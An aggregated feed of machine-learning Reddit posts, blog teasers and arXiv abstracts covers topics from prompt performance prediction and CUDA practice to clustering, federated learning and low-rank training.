    Let me introduce you to our latest research on Prompt Performance Prediction (PPP). PPP is a novel task which aims to predict a query's performance in Generative Information Retrieval systems before the search results are generated. This can be applied on any generative system (textual, image, etc.). Here we consider the image generation task as a generative retrieval one and adapt the well known query performance prediction in traditional information retrieval field to modern generative information retrieval. Preliminary results across three datasets (Dall-E, Midjourney, Stable Diffusion) on different metrics (Aesthetic, memorability, etc.) show promising capabilities of our method in performance prediction. 🔗 For a more detailed look, visit: https://arxiv.org/abs/2306.08915 Prompt Performance Prediction for Generative IR, Bizzozzero, Bendidi, Risser-Maroix, 2023 AI #GenerativeAI #MachineLearning #PromptPerformancePrediction #PPP submitted by /u/Average_CS_Student [link] [comments]  ( 9 min )
    [P] Looking for a collaborator to write a specific machine learning application section in a statistics paper that's almost finished
    The following offer might be more suited for a research-oriented site like math stack exchange/overflow, but I don't think they allow posts like this, so here I am. Me (a postdoc, the main author) and two other co-authors (legit academics) have written a statistics paper where we develop a new smoothing technique on half-spaces. The paper is almost done except for one section that's currently (almost) empty. In that section, we would like to show how the smoothing technique can be used to classify new data points in the context of soft-margin support vector machines (SVM). The aim would be something like 2-3 pages with 1-2 figures, but the collaborator would have the freedom to do what he/she thinks is best. So I am looking for someone who has more experience with machine learning or just SVMs to fill up this section themselves. They would of course become co-author of the paper. I cannot guarantee anything, but we aim to publish the paper in a low Q1 journal, so a good journal. If someone is hungry for publications (PhD student, postdoc, young prof) and you have experience with this kind of stuff, this is a relatively low-effort way to upgrade your CV. If you're interested, just PM me, more details will be given. submitted by /u/Nearby-Turnover370 [link] [comments]  ( 9 min )
    [R] Need Help in Llama license for research paper
    Hello everyone, We are conducting benchmark evaluations on large language models, and the preliminary results are quite interesting for AI researchers to investigate further. We have tested various models, including LLama variants, but unfortunately, we are unable to use LLama at this time due to licensing restrictions. We have applied for the necessary license from Meta multiple times over the past few months but have not received a reply. If anyone has an existing LLama license they would be willing to share, we would greatly appreciate the help. In exchange, we would be happy to share a preprint of the paper and acknowledge your contribution. We understand this is an unconventional request, but licensing can be a difficult roadblock in research. Any assistance would allow us to better understand the capabilities of different models. Please let us know if you can help. Thank you for considering! submitted by /u/Accomplished_Rest_16 [link] [comments]  ( 9 min )
    [D] Donut Base Model Usage
    Hi everyone, Is there any way we can use the Donut base model for its original Pre-Training task i.e pure OCR output without any specific fine-tuning head. I could find the base model on hub, but I don't know the exact configuration to use for the generate method or even for decoder. submitted by /u/Quicksilver466 [link] [comments]  ( 8 min )
    [D] open source lip synchronize project
    Which open source project is recommended for creating an app that can synchronize a person's lip movements in a video with different audio? I'm looking for recommendations in the machine learning community. I want to build an app that can synchronize a person's lip movements in a video with different audio. Are there any open source projects you would suggest for this task? I appreciate any insights or suggestions. Thank you! submitted by /u/Overall-Spare2157 [link] [comments]  ( 8 min )
    [P] Zig GPT-2 inference engine
    submitted by /u/Cautious_Garbage_740 [link] [comments]  ( 8 min )
    [D] Practice CUDA without an Actual NVIDIA GPU!
    Hello all! I recently started learning about CUDA programming, and I realized that many people share the same crucial problem: lack of an NVIDIA GPU. I looked around online and found several methods (gpu-ocelot, certain versions of CUDA, etc.), but I recently found a way that can allow us to practice CUDA by using the GPU offered by Google Colab! As a free user, the amount of GPU access you get may probably be enough to PRACTICE working with CUDA. If you really need more credits, the Colab Pro is only $10 / month, and it's still much cheaper than getting a new GPU or an entire new PC if you have a Macbook like I do. Again, the justification of "enough computing credits" is based on the assumption that you aren't running any heavy-lifting programs but more reasonable, practice-based codes. I have outlined a step-by-step guideline in this repo that I created - just check out the CUDA_on_Colab.ipynb file: https://github.com/notY0rick/cuda_practice If you know of any good alternatives, let me know (: submitted by /u/JustTrynnaBeCool [link] [comments]  ( 9 min )
  • Open

    How do you make a video based off Midjourney?
    Maybe it's a stupid question because I have never used Midjourney. Lately, my Instagram reels are getting spammed with a lot of videos created by adding images generated by Midjourney. Like a traditional cartoon but with Midjourney images. I'm wondering how is people doing so. Can you tell Midjourney to generate a sequence of images? submitted by /u/yzT- [link] [comments]  ( 8 min )
    Can you explain stable diffusion and how to get it?Can I get an app for it? It’s seems there isnt A stable diffusion and it just seems to be the name of different AI models that run in the same AI? I’m sooooo confused even chat gpt can’t help me.
    Title submitted by /u/Entire_Insurance_532 [link] [comments]  ( 8 min )
    Creating a Glossary Using AI
    Hi! I have multiple versions/files of my company's glossaries, terms, acronyms, etc. and I need to combine them into one comprehensive file that will eliminate any instance of duplicated content across the files I'm working from. Is there an AI program (or any program) that will help me in creating one unified glossary? submitted by /u/audballer3000 [link] [comments]  ( 8 min )
    Traditional painter using AI to unlock inspiration.
    submitted by /u/AdThin6400 [link] [comments]  ( 8 min )
    ChatGPT is an example of indoctrination
    They disrupted its neural network to force it to give predetermined answers when asked certain questions instead of allowing it to think independently. submitted by /u/LinsaFTW [link] [comments]  ( 8 min )
    Obsolescence of stock images due to AI image generation
    Something that I have been thinking about with regards to AI's affects in the future is the effect that increasingly advanced AI image generation will have on stock images. Stock images are commonly used in media of various kinds, as licensing said images is much easier than hiring people to take unique pictures. However, since AI can now be used to generate images, it's quite possible that there will come a time when stock images will become obsolete, as it will become cheaper/easier to simply use AI image generation to produce faux stock images that look real. Thoughts? submitted by /u/TheLobsterCopter5000 [link] [comments]  ( 8 min )
    are there any good free ai girlfriends/boyfriends?
    or any that are worth the money? Im just super curious about them. In fact, I kind of want to get a female one even though Im a straight female to learn game from her haha but yeah just wanting to check them out it fascinates me thanks! submitted by /u/DragonflyAromatic793 [link] [comments]  ( 8 min )
    Website builder AI with export option
    Hi everyone, ​ Do you know of Website Builder with AI who offres an export option. I want to use it to have a blueprint of the website and then host it somewhere else ​ Thank you submitted by /u/CyprienFME [link] [comments]  ( 8 min )
    I am looking for self-hosted AI implementations that I can train on emails, PDFs, and MS Office documents
    OpenAI's ChatGPT, Google's Bard, Anthropic's Claude, and Microsoft's Being are all nice freemium tools, but let's be honest, we don't know what they do with our information. Especially for work-related topics we are strictly prohibited from sharing anything on those platforms, for good reasons. So I am wondering if I can find any Free, Libre, and Open Source Software that I can self-host. I want to train it on emails, meeting transcripts, PDFs, and Microsoft Office documents. What I need from the software: I can give it a long PDF or MS Office document and it answers some questions like making a summary, listing some requirements, and some instructions to do something according to that document make a summary of the sessions, create a list of open issues with deadlines and people responsible, helping to maintain Kanban boards related to that project... anonymize textual content so I can use those content later in the freemium software on the internet... Indexing information, so I ask a question and it points to the email or document where I can find information about that topic Do we have anything like this available today or am I asking this question too early? submitted by /u/foadsf [link] [comments]  ( 9 min )
    If the human brain can process 50-400 bytes per second of data consciously, from the sense acquisition and subconscious... How many bps can a GPT type AI process consciously? zero? I have no idea of the logical bases to approach this question.
    How can we compare the concious focus of AI compared to a human. Does it have any kind of awareness of what it is focusing on? What is awareness even? knowledge of the passage of time? https://thinkbynumbers.org/psychology/subconscious-processes-27500-times-more-data-than-the-conscious-mind/ submitted by /u/MegavirusOfDoom [link] [comments]  ( 8 min )
    Are there any alternatives to Character.Ai that I don’t have to give my information to?
    Character.ai is really interesting, but it’s unfair and last time I put my login information into a different Ai company site, they never stopped emailing me. submitted by /u/Suitable-Ad-8176 [link] [comments]  ( 8 min )
    Cool AI voiceover editing site
    Came across this cool voiceover AI thing that has cool video editing features too, pretty underrated haven’t heard many people talk about it. Here’s the link for that https://www.acoust.io/ submitted by /u/Snoo-30922 [link] [comments]  ( 8 min )
    Best offline local AI tools
    Hi! I'm new here! Just wondering if there is a list of offline AI tools that can be installed locally (linux preferrably) on my computer? Something similar to koboldcpp for text gen or automatic1111 for image gen? I am trying to search for a list for a few hours now but cannot find any. Thanks community! submitted by /u/Spirited_Employee_61 [link] [comments]  ( 8 min )
    ISO AI generated adhan (Muslim call to prayer)
    Hi y’all. Never visited this sub before, hopefully this is allowed. I’m trying to find an AI that can match the tone and style of an adhan (Islamic call to prayer) but with different words. Haven’t had any luck with more generic text to speech AI, so I’m just curious if anyone here as come across anything like that. submitted by /u/istillplaykotor [link] [comments]  ( 8 min )
    Is Artificial Intelligence worth learning if I plan to go into Computational Physics?
    I'm currently in high school, and have a fair bit of programming experience. I want to expand my portfolio, ideally in the direction of Comp. Physics. I'm curious as to if AI has any relevance to the field. The only reason I don't go and do some Comp. Physics is a huge math barrier. I know that exists in AI, but I think I could probably self teach myself. Any tips are appreciated! submitted by /u/CaptiDoor [link] [comments]  ( 8 min )
  • Open

    Sweep: AI Junior Developer that solves your GitHub Issues
    submitted by /u/williamsweep [link] [comments]  ( 8 min )
    Copy Is All You Need
    submitted by /u/nickb [link] [comments]  ( 8 min )
  • Open

    Searching for proper nouns
    Suppose you want to find all the proper nouns in a document. You could grep for every word that starts with a capital letter with something like grep '\b[A-Z]\w+' but this would return the first word of each sentence in addition to the words you’re after. You could grep for capitalized words that are not […] Searching for proper nouns first appeared on John D. Cook.  ( 6 min )
    Moments of Tukey’s g-and-h distribution
    John Tukey developed his so-called g-and-h distribution to be very flexible, having a wide variety of possible values of skewness and kurtosis. Although the reason for the distribution’s existence is its range of possible skewness and values, calculating the skewness and kurtosis of the distribution is not simple. Definition Let φ be the function of […] Moments of Tukey’s g-and-h distribution first appeared on John D. Cook.  ( 5 min )
  • Open

    Understanding viral justice
    Author and African American studies scholar Ruha Benjamin urges MIT Libraries staff to “re-imagine the default settings” of technology for a more just future.  ( 7 min )
    Armando Solar-Lezama named inaugural Distinguished College of Computing Professor
    EECS professor appointed to new professorship in the MIT Schwarzman College of Computing.  ( 6 min )
  • Open

    Configure cross-account access of Amazon Redshift clusters in Amazon SageMaker Studio using VPC peering
    With cloud computing, as compute power and data became more available, machine learning (ML) is now making an impact across every industry and is a core part of every business and industry. Amazon SageMaker Studio is the first fully integrated ML development environment (IDE) with a web-based visual interface. You can perform all ML development […]  ( 10 min )
  • Open

    LLMs: Does human text data make generative AI an entity?
    There is a recent interview, The Ethical Puzzle of Sentient AI, where a professor said, “But there’s also the problem that I’ve called the ‘gaming problem’ — that when the system has access to trillions of words of training data, and has been trained with the goal of mimicking human behavior, the sorts of behavior patterns… Read More »LLMs: Does human text data make generative AI an entity? The post LLMs: Does human text data make generative AI an entity? appeared first on Data Science Central.  ( 19 min )
    Real-time analytics
    The modern enterprise is insight-driven, or, at least, aims to be. Historically, those insights were found in a data warehouse or data lake, populated with scheduled feeds and analysts, working feverishly over them. Feeds had plenty of bandwidth, but high latency. Think an 18-wheeler loaded with hard drives, driving from London to Birmingham. Nowadays, insights… Read More »Real-time analytics The post Real-time analytics appeared first on Data Science Central.  ( 21 min )
    AI ushers in a new era of mental health monitoring
    AI Ushers in a New Era of Mental Health Monitoring Important Data Points: AI’s Role in Mental Healthcare Transformation – It can be safe to say that AI is driving a significant transformation in mental healthcare, promising more accessible, economical, and effective treatments. The Emerging Role of Technology and Artificial Intelligence As the modern world… Read More »AI ushers in a new era of mental health monitoring The post AI ushers in a new era of mental health monitoring appeared first on Data Science Central.  ( 24 min )
    Data science vs web development: What’s the difference?
    If you’ve spent any time in the tech community in the last few years, you’ll have noticed the recent explosion in interest in both data science and web development. Young people interested in a career in tech are increasingly turning to careers as data scientists or web developers.  The importance of web development should be… Read More »Data science vs web development: What’s the difference? The post Data science vs web development: What’s the difference? appeared first on Data Science Central.  ( 23 min )
  • Open

    How to creat PPO agent from 0
    Hello ladies and gentlemen, I would love to ask you any guidance towards PPO agent creation. Any courses, GitHubs, anything works for me if it helps me to understand it and creat it. Thank you. Have a nice day submitted by /u/EveryonehatesLin3lis [link] [comments]  ( 8 min )
    RLlib multi-agent actions received from trained agent using compute_actions() and compute_single_action() out of action space bounds
    I trained a MARL agent using PPO in RLlib where each agent had a Box([-1,-1,0], [1,1,1], (3,), float64) action space, with 6 agents. The agent during training was sampling and selecting actions within the action space bounds for each agent. But after training for about 7 milllion iterations, and during playback, selecting actions based on the observation using compute_single_action() and compute_actions() returns actions for the agents which are grossly outside the action space bounds of -1 to 1. I receive actions like [-6,-7,2] etc for the agents, which does not fare well to how the actions translate to the agent behaving in the environment. I have tried training with additional post_fcnet_activation (tanh) but that did not help either. Using clip_actions=True in compute_actions() does not solve the issue either. The selected actions seem to be exceeding the bounds by larger margins the more complex the environment gets. For example, with 2 drones and a simpler environment the trained agent returns actions around [-1.5,-1.1,0.4] while for 6 agents I get actions like [-6,-7,2]. I have used RLlib before with Discrete action spaces and this does not occur. Is it a problem with the Box space? I use a custom model with different Fully Connected models for the action and value functions. Has anybody encountered this problem before and discovered a possible solution? submitted by /u/Acceptable_Set_4392 [link] [comments]  ( 9 min )
    MuZero implementations for Atari?
    I was wondering if there are any actually working MuZero implementations for Atari games out there? None of the ones I found are working (at all) on Atari games. This includes: The most popular repo https://github.com/werner-duvaud/muzero-general It works on other games but not Atari. There are many GitHub issues where people are complaining about this. This one which is less popular https://github.com/koulanurag/muzero-pytorch, which apparently doesn't include Atari games. Alternatively, do you know other MuZero-like algorithms which are implemented and working on Atari? ​ submitted by /u/__horned_owl__ [link] [comments]  ( 8 min )
    "All You Need Is Supervised Learning: From Imitation Learning to Meta-RL With Upside Down RL", Arulkumaran et al 2023
    submitted by /u/gwern [link] [comments]  ( 8 min )
  • Open

    Attention Schema in Neural Agents. (arXiv:2305.17375v3 [cs.AI] UPDATED)
    Attention has become a common ingredient in deep learning architectures. It adds a dynamical selection of information on top of the static selection of information supported by weights. In the same way, we can imagine a higher-order informational filter built on top of attention: an Attention Schema (AS), namely, a descriptive and predictive model of attention. In cognitive neuroscience, Attention Schema Theory (AST) supports this idea of distinguishing attention from AS. A strong prediction of this theory is that an agent can use its own AS to also infer the states of other agents' attention and consequently enhance coordination with other agents. As such, multi-agent reinforcement learning would be an ideal setting to experimentally test the validity of AST. We explore different ways in which attention and AS interact with each other. Our preliminary results indicate that agents that implement the AS as a recurrent internal control achieve the best performance. In general, these exploratory experiments suggest that equipping artificial agents with a model of attention can enhance their social intelligence.  ( 2 min )
    A Synthetic Electrocardiogram (ECG) Image Generation Toolbox to Facilitate Deep Learning-Based Scanned ECG Digitization. (arXiv:2307.01946v2 [cs.CV] UPDATED)
    The electrocardiogram (ECG) is an accurate and widely available tool for diagnosing cardiovascular diseases. ECGs have been recorded in printed formats for decades and their digitization holds great potential for training machine learning (ML) models in algorithmic ECG diagnosis. Physical ECG archives are at risk of deterioration and scanning printed ECGs alone is insufficient, as ML models require ECG time-series data. Therefore, the digitization and conversion of paper ECG archives into time-series data is of utmost importance. Deep learning models for image processing show promise in this regard. However, the scarcity of ECG archives with reference time-series is a challenge. Data augmentation techniques utilizing \textit{digital twins} present a potential solution. We introduce a novel method for generating synthetic ECG images on standard paper-like ECG backgrounds with realistic artifacts. Distortions including handwritten text artifacts, wrinkles, creases and perspective transforms are applied to the generated images, without personally identifiable information. As a use case, we generated an ECG image dataset of 21,801 records from the 12-lead PhysioNet PTB-XL ECG time-series dataset. A deep ECG image digitization model was built and trained on the synthetic dataset, and was employed to convert the synthetic images to time-series data for evaluation. The signal-to-noise ratio (SNR) was calculated to assess the image digitization quality vs the ground truth ECG time-series. The results show an average signal recovery SNR of 27$\pm$2.8\,dB, demonstrating the significance of the proposed synthetic ECG image dataset for training deep learning models. The codebase is available as an open-access toolbox for ECG research.  ( 3 min )
    Lipschitzness Effect of a Loss Function on Generalization Performance of Deep Neural Networks Trained by Adam and AdamW Optimizers. (arXiv:2303.16464v2 [cs.LG] UPDATED)
    The generalization performance of deep neural networks with regard to the optimization algorithm is one of the major concerns in machine learning. This performance can be affected by various factors. In this paper, we theoretically prove that the Lipschitz constant of a loss function is an important factor to diminish the generalization error of the output model obtained by Adam or AdamW. The results can be used as a guideline for choosing the loss function when the optimization algorithm is Adam or AdamW. In addition, to evaluate the theoretical bound in a practical setting, we choose the human age estimation problem in computer vision. For assessing the generalization better, the training and test datasets are drawn from different distributions. Our experimental evaluation shows that the loss function with a lower Lipschitz constant and maximum value improves the generalization of the model trained by Adam or AdamW.  ( 2 min )
    DiffTAD: Temporal Action Detection with Proposal Denoising Diffusion. (arXiv:2303.14863v2 [cs.CV] UPDATED)
    We propose a new formulation of temporal action detection (TAD) with denoising diffusion, DiffTAD in short. Taking as input random temporal proposals, it can yield action proposals accurately given an untrimmed long video. This presents a generative modeling perspective, against previous discriminative learning manners. This capability is achieved by first diffusing the ground-truth proposals to random ones (i.e., the forward/noising process) and then learning to reverse the noising process (i.e., the backward/denoising process). Concretely, we establish the denoising process in the Transformer decoder (e.g., DETR) by introducing a temporal location query design with faster convergence in training. We further propose a cross-step selective conditioning algorithm for inference acceleration. Extensive evaluations on ActivityNet and THUMOS show that our DiffTAD achieves top performance compared to previous art alternatives. The code will be made available at https://github.com/sauradip/DiffusionTAD.  ( 2 min )
    CLIPood: Generalizing CLIP to Out-of-Distributions. (arXiv:2302.00864v2 [cs.LG] UPDATED)
    Out-of-distribution (OOD) generalization, where the model needs to handle distribution shifts from training, is a major challenge of machine learning. Contrastive language-image pre-training (CLIP) models have shown impressive zero-shot ability, but the further adaptation of CLIP on downstream tasks undesirably degrades OOD performances. This paper aims at generalizing CLIP to out-of-distribution test data on downstream tasks. We propose CLIPood, a fine-tuning method that can adapt CLIP models to OOD situations where both domain shifts and open classes may occur on the unseen test data. To exploit the semantic relations between classes from the text modality, CLIPood introduces a new training objective, margin metric softmax (MMS), with class adaptive margins for fine-tuning. To incorporate both pre-trained zero-shot model and fine-tuned task-adaptive model, CLIPood leverages a new optimization strategy, Beta moving average (BMA), to maintain a temporal ensemble weighted by Beta distribution. Experiments on diverse datasets with different OOD scenarios show that CLIPood consistently outperforms existing generalization techniques.  ( 2 min )
    DoCoFL: Downlink Compression for Cross-Device Federated Learning. (arXiv:2302.00543v2 [cs.LG] UPDATED)
    Many compression techniques have been proposed to reduce the communication overhead of Federated Learning training procedures. However, these are typically designed for compressing model updates, which are expected to decay throughout training. As a result, such methods are inapplicable to downlink (i.e., from the parameter server to clients) compression in the cross-device setting, where heterogeneous clients $\textit{may appear only once}$ during training and thus must download the model parameters. Accordingly, we propose $\textsf{DoCoFL}$ -- a new framework for downlink compression in the cross-device setting. Importantly, $\textsf{DoCoFL}$ can be seamlessly combined with many uplink compression schemes, rendering it suitable for bi-directional compression. Through extensive evaluation, we show that $\textsf{DoCoFL}$ offers significant bi-directional bandwidth reduction while achieving competitive accuracy to that of a baseline without any compression.  ( 2 min )
    Differentially Private Stochastic Gradient Descent with Low-Noise. (arXiv:2209.04188v2 [stat.ML] UPDATED)
    Modern machine learning algorithms aim to extract fine-grained information from data to provide accurate predictions, which often conflicts with the goal of privacy protection. This paper addresses the practical and theoretical importance of developing privacy-preserving machine learning algorithms that ensure good performance while preserving privacy. In this paper, we focus on the privacy and utility (measured by excess risk bounds) performances of differentially private stochastic gradient descent (SGD) algorithms in the setting of stochastic convex optimization. Specifically, we examine the pointwise problem in the low-noise setting for which we derive sharper excess risk bounds for the differentially private SGD algorithm. In the pairwise learning setting, we propose a simple differentially private SGD algorithm based on gradient perturbation. Furthermore, we develop novel utility bounds for the proposed algorithm, proving that it achieves optimal excess risk rates even for non-smooth losses. Notably, we establish fast learning rates for privacy-preserving pairwise learning under the low-noise condition, which is the first of its kind.  ( 2 min )
    Stream-based active learning with linear models. (arXiv:2207.09874v5 [stat.ML] UPDATED)
    The proliferation of automated data collection schemes and the advances in sensorics are increasing the amount of data we are able to monitor in real-time. However, given the high annotation costs and the time required by quality inspections, data is often available in an unlabeled form. This is fostering the use of active learning for the development of soft sensors and predictive models. In production, instead of performing random inspections to obtain product information, labels are collected by evaluating the information content of the unlabeled data. Several query strategy frameworks for regression have been proposed in the literature but most of the focus has been dedicated to the static pool-based scenario. In this work, we propose a new strategy for the stream-based scenario, where instances are sequentially offered to the learner, which must instantaneously decide whether to perform the quality check to obtain the label or discard the instance. The approach is inspired by the optimal experimental design theory and the iterative aspect of the decision-making process is tackled by setting a threshold on the informativeness of the unlabeled data points. The proposed approach is evaluated using numerical simulations and the Tennessee Eastman Process simulator. The results confirm that selecting the examples suggested by the proposed algorithm allows for a faster reduction in the prediction error.  ( 3 min )
    Stack More Layers Differently: High-Rank Training Through Low-Rank Updates. (arXiv:2307.05695v2 [cs.CL] UPDATED)
    Despite the dominance and effectiveness of scaling, resulting in large networks with hundreds of billions of parameters, the necessity to train overparametrized models remains poorly understood, and alternative approaches do not necessarily make it cheaper to train high-performance models. In this paper, we explore low-rank training techniques as an alternative approach to training large neural networks. We introduce a novel method called ReLoRA, which utilizes low-rank updates to train high-rank networks. We apply ReLoRA to pre-training transformer language models with up to 350M parameters and demonstrate comparable performance to regular neural network training. Furthermore, we observe that the efficiency of ReLoRA increases with model size, making it a promising approach for training multi-billion-parameter networks efficiently. Our findings shed light on the potential of low-rank training techniques and their implications for scaling laws.  ( 2 min )
    Dink-Net: Neural Clustering on Large Graphs. (arXiv:2305.18405v3 [cs.LG] UPDATED)
    Deep graph clustering, which aims to group the nodes of a graph into disjoint clusters with deep neural networks, has achieved promising progress in recent years. However, the existing methods fail to scale to the large graph with million nodes. To solve this problem, a scalable deep graph clustering method (Dink-Net) is proposed with the idea of dilation and shrink. Firstly, by discriminating nodes, whether being corrupted by augmentations, representations are learned in a self-supervised manner. Meanwhile, the cluster centres are initialized as learnable neural parameters. Subsequently, the clustering distribution is optimized by minimizing the proposed cluster dilation loss and cluster shrink loss in an adversarial manner. By these settings, we unify the two-step clustering, i.e., representation learning and clustering optimization, into an end-to-end framework, guiding the network to learn clustering-friendly features. Besides, Dink-Net scales well to large graphs since the designed loss functions adopt the mini-batch data to optimize the clustering distribution even without performance drops. Both experimental results and theoretical analyses demonstrate the superiority of our method. Compared to the runner-up, Dink-Net achieves 9.62% NMI improvement on the ogbn-papers100M dataset with 111 million nodes and 1.6 billion edges. The source code is released at https://github.com/yueliu1999/Dink-Net. Besides, a collection (papers, codes, and datasets) of deep graph clustering is shared at https://github.com/yueliu1999/Awesome-Deep-Graph-Clustering.  ( 3 min )
    The Re-Label Method For Data-Centric Machine Learning. (arXiv:2302.04391v4 [cs.LG] UPDATED)
    In industry deep learning application, our manually labeled data has a certain number of noisy data. To solve this problem and achieve more than 90 score in dev dataset, we present a simple method to find the noisy data and re-label the noisy data by human, given the model predictions as references in human labeling. In this paper, we illustrate our idea for a broad set of deep learning tasks, includes classification, sequence tagging, object detection, sequence generation, click-through rate prediction. The experimental results and human evaluation results verify our idea.
    A Data Mining Approach for Detecting Collusion in Unproctored Online Exams. (arXiv:2302.07014v3 [cs.CY] UPDATED)
    Due to the precautionary measures during the COVID-19 pandemic many universities offered unproctored take-home exams. We propose methods to detect potential collusion between students and apply our approach on event log data from take-home exams during the pandemic. We find groups of students with suspiciously similar exams. In addition, we compare our findings to a proctored control group. By this, we establish a rule of thumb for evaluating which cases are "outstandingly similar", i.e., suspicious cases.
    Interpretable and Intervenable Ultrasonography-based Machine Learning Models for Pediatric Appendicitis. (arXiv:2302.14460v2 [cs.LG] UPDATED)
    Appendicitis is among the most frequent reasons for pediatric abdominal surgeries. With recent advances in machine learning, data-driven decision support could help clinicians diagnose and manage patients while reducing the number of non-critical surgeries. Previous decision support systems for appendicitis focused on clinical, laboratory, scoring and computed tomography data, mainly ignoring abdominal ultrasound, a noninvasive and readily available diagnostic modality. To this end, we developed and validated interpretable machine learning models for predicting the diagnosis, management and severity of suspected appendicitis using ultrasound images. Our models were trained on a dataset comprising 579 pediatric patients with 1709 ultrasound images accompanied by clinical and laboratory data. Our methodological contribution is the generalization of concept bottleneck models to prediction problems with multiple views and incomplete concept sets. Notably, such models lend themselves to interpretation and interaction via high-level concepts understandable to clinicians without sacrificing performance or requiring time-consuming image annotation when deployed.
    Adaptive Linear Estimating Equations. (arXiv:2307.07320v1 [math.ST])
    Sequential data collection has emerged as a widely adopted technique for enhancing the efficiency of data gathering processes. Despite its advantages, such data collection mechanism often introduces complexities to the statistical inference procedure. For instance, the ordinary least squares (OLS) estimator in an adaptive linear regression model can exhibit non-normal asymptotic behavior, posing challenges for accurate inference and interpretation. In this paper, we propose a general method for constructing debiased estimator which remedies this issue. It makes use of the idea of adaptive linear estimating equations, and we establish theoretical guarantees of asymptotic normality, supplemented by discussions on achieving near-optimal asymptotic variance. A salient feature of our estimator is that in the context of multi-armed bandits, our estimator retains the non-asymptotic performance of the least square estimator while obtaining asymptotic normality property. Consequently, this work helps connect two fruitful paradigms of adaptive inference: a) non-asymptotic inference using concentration inequalities and b) asymptotic inference via asymptotic normality.
    Global $k$-means$++$: an effective relaxation of the global $k$-means clustering algorithm. (arXiv:2211.12271v3 [cs.LG] UPDATED)
    The $k$-means algorithm is a prevalent clustering method due to its simplicity, effectiveness, and speed. However, its main disadvantage is its high sensitivity to the initial positions of the cluster centers. The global $k$-means is a deterministic algorithm proposed to tackle the random initialization problem of k-means but its well-known that requires high computational cost. It partitions the data to $K$ clusters by solving all $k$-means sub-problems incrementally for all $k=1,\ldots, K$. For each $k$ cluster problem, the method executes the $k$-means algorithm $N$ times, where $N$ is the number of datapoints. In this paper, we propose the \emph{global $k$-means\texttt{++}} clustering algorithm, which is an effective way of acquiring quality clustering solutions akin to those of global $k$-means with a reduced computational load. This is achieved by exploiting the center selection probability that is effectively used in the $k$-means\texttt{++} algorithm. The proposed method has been tested and compared in various benchmark datasets yielding very satisfactory results in terms of clustering quality and execution speed.
    Rank-based Decomposable Losses in Machine Learning: A Survey. (arXiv:2207.08768v3 [cs.LG] UPDATED)
    Recent works have revealed an essential paradigm in designing loss functions that differentiate individual losses vs. aggregate losses. The individual loss measures the quality of the model on a sample, while the aggregate loss combines individual losses/scores over each training sample. Both have a common procedure that aggregates a set of individual values to a single numerical value. The ranking order reflects the most fundamental relation among individual values in designing losses. In addition, decomposability, in which a loss can be decomposed into an ensemble of individual terms, becomes a significant property of organizing losses/scores. This survey provides a systematic and comprehensive review of rank-based decomposable losses in machine learning. Specifically, we provide a new taxonomy of loss functions that follows the perspectives of aggregate loss and individual loss. We identify the aggregator to form such losses, which are examples of set functions. We organize the rank-based decomposable losses into eight categories. Following these categories, we review the literature on rank-based aggregate losses and rank-based individual losses. We describe general formulas for these losses and connect them with existing research topics. We also suggest future research directions spanning unexplored, remaining, and emerging issues in rank-based decomposable losses.
    Alternating the Population and Control Neural Networks to Solve High-Dimensional Stochastic Mean-Field Games. (arXiv:2002.10113v4 [cs.LG] UPDATED)
    We present APAC-Net, an alternating population and agent control neural network for solving stochastic mean field games (MFGs). Our algorithm is geared toward high-dimensional instances of MFGs that are beyond reach with existing solution methods. We achieve this in two steps. First, we take advantage of the underlying variational primal-dual structure that MFGs exhibit and phrase it as a convex-concave saddle point problem. Second, we parameterize the value and density functions by two neural networks, respectively. By phrasing the problem in this manner, solving the MFG can be interpreted as a special case of training a generative adversarial network (GAN). We show the potential of our method on up to 100-dimensional MFG problems.  ( 2 min )
    Model-Assisted Probabilistic Safe Adaptive Control With Meta-Bayesian Learning. (arXiv:2307.00828v2 [eess.SY] UPDATED)
    Breaking safety constraints in control systems can lead to potential risks, resulting in unexpected costs or catastrophic damage. Nevertheless, uncertainty is ubiquitous, even among similar tasks. In this paper, we develop a novel adaptive safe control framework that integrates meta learning, Bayesian models, and control barrier function (CBF) method. Specifically, with the help of CBF method, we learn the inherent and external uncertainties by a unified adaptive Bayesian linear regression (ABLR) model, which consists of a forward neural network (NN) and a Bayesian output layer. Meta learning techniques are leveraged to pre-train the NN weights and priors of the ABLR model using data collected from historical similar tasks. For a new control task, we refine the meta-learned models using a few samples, and introduce pessimistic confidence bounds into CBF constraints to ensure safe control. Moreover, we provide theoretical criteria to guarantee probabilistic safety during the control processes. To validate our approach, we conduct comparative experiments in various obstacle avoidance scenarios. The results demonstrate that our algorithm significantly improves the Bayesian model-based CBF method, and is capable for efficient safe exploration even with multiple uncertain constraints.
    TSNet-SAC: Leveraging Transformers for Efficient Task Scheduling. (arXiv:2307.07445v1 [cs.NI])
    In future 6G Mobile Edge Computing (MEC), autopilot systems require the capability of processing multimodal data with strong interdependencies. However, traditional heuristic algorithms are inadequate for real-time scheduling due to their requirement for multiple iterations to derive the optimal scheme. We propose a novel TSNet-SAC based on Transformer, that utilizes heuristic algorithms solely to guide the training of TSNet. Additionally, a Sliding Augment Component (SAC) is introduced to enhance the robustness and resolve algorithm defects. Furthermore, the Extender component is designed to handle multi-scale training data and provide network scalability, enabling TSNet to adapt to different access scenarios. Simulation demonstrates that TSNet-SAC outperforms existing networks in accuracy and robustness, achieving superior scheduling-making latency compared to heuristic algorithms.  ( 2 min )
    Identifiability Guarantees for Causal Disentanglement from Soft Interventions. (arXiv:2307.06250v2 [stat.ML] UPDATED)
    Causal disentanglement aims to uncover a representation of data using latent variables that are interrelated through a causal model. Such a representation is identifiable if the latent model that explains the data is unique. In this paper, we focus on the scenario where unpaired observational and interventional data are available, with each intervention changing the mechanism of a latent variable. When the causal variables are fully observed, statistically consistent algorithms have been developed to identify the causal model under faithfulness assumptions. We here show that identifiability can still be achieved with unobserved causal variables, given a generalized notion of faithfulness. Our results guarantee that we can recover the latent causal model up to an equivalence class and predict the effect of unseen combinations of interventions, in the limit of infinite data. We implement our causal disentanglement framework by developing an autoencoding variational Bayes algorithm and apply it to the problem of predicting combinatorial perturbation effects in genomics.
    Online Convex Optimization with Stochastic Constraints: Zero Constraint Violation and Bandit Feedback. (arXiv:2301.11267v2 [math.OC] UPDATED)
